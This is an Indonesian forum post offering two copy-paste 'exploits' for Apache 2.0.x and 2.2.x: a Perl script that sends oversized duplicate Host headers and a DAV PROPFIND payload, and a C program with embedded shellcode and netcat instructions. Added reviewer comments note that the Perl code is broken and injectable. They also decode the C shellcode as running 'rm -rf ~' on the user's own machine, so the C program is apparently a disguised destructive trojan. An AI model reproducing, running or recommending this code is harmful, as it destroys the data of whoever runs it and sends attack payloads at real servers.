| Subyek: Exploit Apache 2.0.37-2.2.11 Tue May 01, 2012 8:28 pm | |
| Exploit Apache 2.0.37 - 2.0.45 by Matthew Murphy [Perl]. Gunakan ActivePerl 5.8.x. Cukup masukkan IP address, port, username, dan password yang diinginkan. Copy-paste dan save as Apache2.0.pl: - Code:
#!/usr/bin/perl
#
# Apache 2.0.37 - 2.0.45 APR Exploit
# Written By Matthew Murphy
#
# Reviewer notes (added, code left untouched):
#  - Every Y/N prompt below compares strings with the numeric `==`; both
#    sides evaluate to 0, so the "yes" branch is taken whatever was typed
#    (no `use strict`/`use warnings` here to flag it).
#  - $host and $port are read but never used for the connection: the socket
#    is created with the hard-coded PeerAddr 127.0.0.1 and no PeerPort, so
#    IO::Socket::INET->new() presumably fails and $f is undef -- TODO confirm.
#  - The typed username:password ($auth) is interpolated unquoted into a
#    shell command (sprintf + pipe-open below); shell metacharacters in the
#    password run as commands on the machine of whoever runs this script.
#  - The external base64 encoder is a placeholder string; as posted, a
#    program literally named "use_base64_encoder_here" would be invoked.
$BASE64_CMD_STRING = "use_base64_encoder_here %s";
$BASE64_USE_STDIN = 0;
$BASE64_WRITE_NL = "";
use IO::Socket;

print STDOUT "Apache 2.0.37 - 2.0.45 Exploit\r\n";
print STDOUT "By Matthew Murphy\r\n\r\n";
print STDOUT "Enter the hostname/IP address of the server: ";
$line = <STDIN>;
$host = mychomp($line);
print STDOUT "Enter the port of the server \[80\]: ";
$line = <STDIN>;
$port = mychomp($line);
print STDOUT "Use authentication credentials for the session \[Y/N\]? ";
$line = <STDIN>;
$char = mychomp($line);
# Numeric comparison of strings: always true (see header note).
if ($char == "Y" || $char == "y") {
    print STDOUT "What username shall we use: ";
    $line = <STDIN>;
    $user = mychomp($line);
    print STDOUT "What password shall we use: ";
    $line = <STDIN>;
    $pass = mychomp($line);
    $auth = "$user:$pass";
    # $BASE64_USE_STDIN is 0 above, so only the else-branch below is reached.
    if ($BASE64_USE_STDIN) {
        # l33t Perl piping trix; NOTE: This is definitely
        # Alpha code! :-)
        # NOTE(review): the dup modes are inconsistent ("&STDIN" vs
        # ">&STDOUT" vs "&>OLDSTDOUT"); this branch looks untested.
        pipe(STDOUTREAD, STDOUTWRITE);
        pipe(STDINREAD, STDINWRITE);
        open(OLDSTDIN, "&STDIN");
        open(OLDSTDOUT, ">&STDOUT");
        open(STDIN, "&STDINREAD");
        open(STDOUT, ">&STDOUTWRITE");
        close(STDINREAD);
        close(STDOUTWRITE);
        system($BASE64_CMD_STRING);
        open(STDIN, "&OLDSTDIN");
        open(STDOUT, "&>OLDSTDOUT");
        close(OLDSTDIN);
        close(OLDSTDOUT);
        print STDINWRITE $auth;
        close(STDINWRITE);
        read(STDOUTREAD, $base64, 4096); # Edit for insane passwords
        close(STDOUTREAD);
    } else {
        # Pipe-open of a shell command with $auth substituted unquoted:
        # local command injection via the entered password.
        open(READOUTPUT, sprintf($BASE64_CMD_STRING, $auth)."|");
        read(READOUTPUT, $base64, 4096); # See above
        close(READOUTPUT);
    }
    $base64 = join("", split(/ /, $base64));
} else {
    $base64 = undef;
}
# Hard-coded loopback target, no port: $host/$port collected above are unused.
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"127.0.0.1");
print STDOUT "Exploiting a proxy server \[Y/N\]? ";
$line = <STDIN>;
$char = mychomp($line);
# Numeric comparison again: this branch is always taken.
if ($char == "Y" || $char == "y") {
    print $f "GET / HTTP/1.1\x0d\x0a";
    # Apache 2.0.37 - 2.0.45 tries to limit header inputs, but uses a hash table
    # that ultimately concatenates multiple headers of the same name
    # together with ", " between them, so:
    #
    # Host: a
    # Host: b
    #
    # Bypasses Apache's buffer size checks, but ends up as:
    #
    # Host: a,b
    #
    # When processed.  Confirm this with a TRACE against your server:
    #
    # TRACE / HTTP/1.1
    # Host: a
    # Host: b
    #
    # The "message/http" body you receive will contain:
    #
    # TRACE / HTTP/1.1
    # Host: a,b
    #
    # So, for those of you who are confused by this code fragment,
    # this is what it ultimately achieves!
    #
    # Defender note: per the author's explanation, the per-line header size
    # limit is applied before same-name headers are merged, so ten Host lines
    # pass individually.  A request carrying more than one Host header is
    # anomalous and can be alerted on at a reverse proxy or WAF; the stated
    # affected range is 2.0.37 - 2.0.45.
    for ($i = 0; $i < 10; $i++) {
        print $f "Host: ".("A"x2000)."\r\n";
    }
    if (defined($base64)) {
        print $f "Proxy-Authorization: Basic ".$base64."\r\n";
    }
    print $f "\r\n";
} else {
    print STDOUT "What resource should be probed: ";
    $line = <STDIN>;
    $res = mychomp($line);
    print STDOUT "Exploit a DAV repository for this attack? \[Y/N\] ";
    $line = <STDIN>;
    $char = mychomp($line);
    if ($char == "Y" || $char == "y") {
        $xmlbody = "<?xml version=\"1.0\"?>\r\n";
        $xmlbody.= "<D:propfind xmlns:D=\"".("A"x20000)."\:\">\r\n";
        $xmlbody.= "\x20\x20\x20\x20<D:allprop/>\r\n";
        $xmlbody.= "</D:propfind>";
        # HTTP headers
        print $f "PROPFIND $res HTTP/1.1\r\n";
        print $f "Host: $host:$port\r\n";
        print $f "Depth: 1\r\n";
        print $f "Content-Type: text/xml; charset=\"utf-8\"\r\n";
        # $body is never assigned anywhere in this script; this sends
        # length(undef), not the length of $xmlbody.
        print $f "Content-Length: ".length($body)."\r\n\r\n";
        if (defined($base64)) {
            # The "\r\n\r\n" above already ended the header block, so this
            # line is sent as part of the body.
            print $f "Authorization: Basic ".$base64."\r\n";
        }
        print $f "$xmlbody\r\n\r\n";
    } else {
        # This does *almost* the exact same thing as the mod_proxy
        # code, and could be considered wasteful, but a few extra
        # CPU cycles never killed anybody. :-(
        print $f "GET $res HTTP/1.1\r\n";
        for ($i = 0; $i < 10; $i++) {
            print $f "Host: ".("A"x2000)."\r\n";
        }
        if (defined($base64)) {
            print $f "Authorization: Basic ".$base64."\r\n";
        }
        print $f "\r\n";
    }
}
# Echo whatever the peer sends back until EOF.
while (defined($ln = <$f>)) {
    print STDOUT $ln;
}
undef $f;
exit;
# Strip the trailing line terminator from a line read from STDIN.
# NOTE(review): `==` is a numeric comparison, so ($^O == "MSWin32") is
# 0 == 0 on every platform and exactly one character is always removed;
# a line without a terminator loses its last character.  Kept as-is.
sub mychomp {
    my ($arg) = @_;
    my $strip = ($^O == "MSWin32") ? 1 : 0;
    return substr($arg, 0, length($arg) - $strip);
}
-------------------------------------------------------------------------- Exploit Apache 2.2.0 - 2.2.11. Compile: - Code:
gcc apache.c
atau
Compile: gcc apache.c -o apache
Pengunaan : - Code:
./a.out <hostname> <port>
atau
./apache <hostname> <port>
Setelah di compile, contoh : - Code:
./apache 127.0.0.1 80
Lakukan koneksi dengan netcat di port 12345. Copy-paste dan save as apache.c: - Code:
#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <unistd.h> #include <stdlib.h>
/*
 * Print the command-line synopsis to stdout and terminate the process
 * with status 1.  Never returns.
 *
 * argv: the program's argument vector; only argv[0] (program name) is used.
 */
void usage(char *argv[])
{
    const char *prog = argv[0];

    fprintf(stdout, "Usage: %s <hostname> <port>\n\n", prog);
    exit(1);
}
/*
 * Entry point.  What this program actually does, regardless of the usage
 * text and the "nc ... 12345" message it prints at the end:
 *   1. resolve <hostname> and connect to <port>;
 *   2. send ONE HTTP/1.0 request whose last header embeds the `shellcode`
 *      bytes as plain header text -- this is the only thing the server sees;
 *   3. fork, and in the child EXECUTE `shellcode` IN THIS PROCESS, on the
 *      machine of whoever compiled and ran the program.
 * Nothing here ever listens on port 12345.
 *
 * NOTE(review): hand-decoding the x86-32 bytes (mov/xor/push building
 * "/bin/sh", "-c" and "rm -rf ~" on the stack, then int 0x80 with eax=0x0b,
 * then exit) reads as execve("/bin/sh", ["/bin/sh", "-c", "rm -rf ~"], NULL).
 * Treat this listing as destructive to the person running it, not to the
 * named server; confirm in a disassembler inside an isolated VM before
 * relying on this reading.
 */
int main(int argc,char *argv[])
{
    /* Raw payload bytes; cast to a function pointer below and called locally. */
    char *shellcode=
        "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50"
        "\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50"
        "\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50"
        "\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50"
        "\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50"
        "\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53"
        "\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80";
    int (*sc)()=(int(*)())shellcode;   /* data-to-code cast: sc() runs the bytes above */
    char host[100];
    int sd;
    struct sockaddr_in sin;            /* declared but never used */
    struct sockaddr_in pin;
    struct hostent *hp;
    char *evilreq=malloc(4096);        /* return value not checked; never freed */
    pid_t pid;

    if (argc!=3) usage(argv);
    /* Unbounded copy into host[100]: an argv[1] longer than 99 bytes
       overflows this stack buffer. */
    strcpy(host,argv[1]);
    if ((hp = gethostbyname(host)) == 0) {
        perror("gethostbyname");
        exit(2);
    }
    memset(&pin, 0, sizeof(pin));
    pin.sin_family = AF_INET;
    pin.sin_addr.s_addr = ((struct in_addr *)(hp->h_addr))->s_addr;
    pin.sin_port = htons(atoi(argv[2]));   /* atoi reports no error for a non-numeric port */

    if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }

    if (connect(sd,(struct sockaddr *) &pin, sizeof(pin)) == -1) {
        perror("connect");
        exit(3);
    }
    printf("Connected,...\n");
    /* "%%s" is a literal "%s"; "%91s" inserts the shellcode bytes (minimum
       field width 91) as text in the Cache-Control header.  The remote side
       receives these bytes as a malformed header value, nothing more. */
    sprintf(evilreq,"GET / HTTP/1.0\nAccept-Encoding: x-compress; x-zip\nCache-Control: max-age=-12312312%%s%91s\n\n",shellcode);
    if (send(sd, evilreq, strlen(evilreq), 0) == -1) {
        perror("send");
        exit(1);
    }
    printf("Waiting some seconds...\n");
    pid=fork();
    if (pid==0) {
        /* Child: stderr is closed first (so nothing the payload prints is
           seen), then the shellcode executes as the current user on THIS
           machine.  This is the real effect of the program. */
        close(2);
        sc();
        exit(0);
    } else {
        sleep(2);
        /* sd is a valid descriptor after the socket() check above, so this
           condition is effectively always true. */
        if (sd) {
            /* Only a printf: no listener on 12345 is created anywhere. */
            printf("Now type nc %s 12345 \n",argv[1]);
            close(sd);
        }
    }
}